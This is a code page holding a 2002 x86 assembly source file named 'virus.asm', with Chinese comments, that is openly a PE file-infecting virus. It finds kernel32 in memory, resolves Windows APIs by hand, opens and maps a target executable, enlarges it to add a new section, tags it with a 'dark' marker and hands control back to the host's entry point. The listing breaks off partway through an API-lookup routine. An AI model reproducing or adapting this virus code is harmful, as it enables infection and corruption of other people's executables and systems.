📄 virus.asm
字号:
.586
.model flat, stdcall
option casemap :none ; case sensitive
include c:\hd\hd.h
include c:\hd\mac.h
;;--------------
GetApiA proto :DWORD,:DWORD
;;--------------
.CODE
VirusLen = vEnd-vBegin ;Virus 长度
vBegin:
;-----------------------------------------
include s_api.asm ;查找需要的api地址
;-----------------------------------------
desfile db "sc.exe",0
fsize dd ?
hfile dd ?
hMap dd ?
pMem dd ?
;-----------------------------------------
pe_Header dd ?
sec_align dd ?
file_align dd ?
newEip dd ?
oldEip dd ?
inc_size dd ?
oldEnd dd ?
;-----------------------------------------
sMessageBoxA db "MessageBoxA",0
aMessageBoxA dd 0
;;临时变量...
sztit db "By Hume,2002",0
szMsg0 db "Hey,Hope U enjoy it!",0
CopyRight db "The SoftWare WAS OFFERRED by Hume[AfO]",0dh,0ah
db " Thx for using it!",0dh,0ah
db "Contact: Humewen@21cn.com",0dh,0ah
db " humeasm.yeah.net",0dh,0ah
db "The add Code SiZe:(heX)"
val dd 0,0,0,0
;;-----------------------------------------
__Start:
call _gd
_gd:
pop ebp ;得到delta地址
sub ebp,offset _gd
;因为在其他程序中基址可能不是默认的所以需要重定位
mov dword ptr [ebp+appBase],ebp ;呵呵仔细想想
mov eax,[esp] ;返回地址
xor edx,edx
getK32Base:
dec eax ;逐字节比较验证
mov dx,word ptr [eax+IMAGE_DOS_HEADER.e_lfanew] ;就是ecx+3ch
test dx,0f000h ;Dos
Header+stub不可能太大,超过4096byte
jnz getK32Base ;加速检验
cmp eax,dword ptr
[eax+edx+IMAGE_NT_HEADERS.OptionalHeader.ImageBase]
jnz getK32Base ;看Image_Base值是否等于ecx即模块起始值,
mov [ebp+k32Base],eax ;如果是,就认为找到kernel32的Base值
lea edi,[ebp+aGetModuleHandle]
lea esi,[ebp+lpApiAddrs]
lop_get:
lodsd
cmp eax,0
jz End_Get
add eax,ebp
push eax
push dword ptr [ebp+k32Base]
call GetApiA
stosd
jmp lop_get ;获得api地址,参见s_api文件
End_Get:
call my_infect
include dislen.asm
;-----------------------------------------
CouldNotInfect:
__where:
xor eax,eax ;判断是否是已经附加,标志'dark'
push eax
call [ebp+aGetModuleHandle]
mov esi,eax
add esi,[esi+3ch] ;->esi->程序本身的Pe_header
cmp dword ptr [esi+8],'dark'
je jmp_oep
jmp __xit ;退出启动程序
jmp_oep:
add eax,[ebp+oldEip]
jmp eax ;跳到宿主程序的入口点
my_infect: ;感染部分,文件读写操作,Pe文件修改参见modipe.asm文件
xor eax,eax
push eax
push eax
push OPEN_EXISTING
push eax
push eax
push GENERIC_READ+GENERIC_WRITE
lea eax,[ebp+desfile]
push eax
call [ebp+aCreateFile] ;打开目标文件
inc eax
je __Err
dec eax
mov [ebp+hfile],eax
push eax
sub ebx,ebx
push ebx
push eax ;得到文件大小
call [ebp+aGetFileSize]
inc eax
je __sclosefile
dec eax
mov [ebp+fsize],eax
xchg eax,ecx
add ecx,1000h ;文件大小增加...4096
pop eax
xor ebx,ebx ;创建映射文件
push ebx
push ecx ;文件大小等于原大小+Vsize
push ebx
push PAGE_READWRITE
push ebx
push eax
call [ebp+aCreateFileMapping]
test eax,eax
je __sclosefile
mov [ebp+hMap],eax ;创建成功否?
xor ebx,ebx
push ebx
push ebx
push ebx
push FILE_MAP_WRITE
push eax
call [ebp+aMapViewOfFile]
test eax,eax
je __sclosemap ; 映射文件,是否成功?
mov [ebp+pMem],eax
;--------------------------------------------
; the following is modifying part,add new section
;--------------------------------------------
include modipe.asm
__sunview:
push [ebp+pMem]
call [ebp+aUnmapViewOfFile]
__sclosemap:
push [ebp+hMap]
call [ebp+aCloseHandle]
__sclosefile:
push [ebp+hfile]
call [ebp+aCloseHandle]
__Err::
ret
;-----------------------------------------
__xit:
push 0
call [ebp+aExitProcess]
vEnd:
;-----------------------------------------
END __Start
;;==============================================
;;s_api.asm
;;手动查找api部分
K32_api_retrieve proc Base:DWORD ,sApi:DWORD
push edx ;保存edx
xor eax,eax ;此时esi=sApi
Next_Api: ;edi=AddressOfNames
mov esi,sApi
xor edx,edx
dec edx
Match_Api_name:
movzx ebx,byte ptr [esi]
inc esi
cmp ebx,0
je foundit
inc edx
push eax
mov eax,[edi+eax*4] ;AddressOfNames的指针,递增
add eax,Base ;注意是RVA,一定要加Base值
cmp bl,byte ptr [eax+edx] ;逐字符比较
pop eax
je Match_Api_name ;继续搜寻
inc eax ;不匹配,下一个api
loop Next_Api
no_exist:
pop edx ;若全部搜完,即未存在
xor eax,eax
ret
foundit:
pop edx ;edx=AddressOfNameOrdinals
;*2得到AddressOfNameOrdinals的指针
movzx eax,word ptr [edx+eax*2] ;eax返回指向AddressOfFunctions的指针
ret
K32_api_retrieve endp
;-----------------------------------------
GetApiA proc Base:DWORD,sApi:DWORD
local ADDRofFun:DWORD
pushad
mov esi,Base
mov eax,esi
mov ebx,eax
mov ecx,eax
mov edx,eax
mov edi,eax ;all is Base!
add ecx,[ecx+3ch] ;现在esi=off PE_HEADER
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -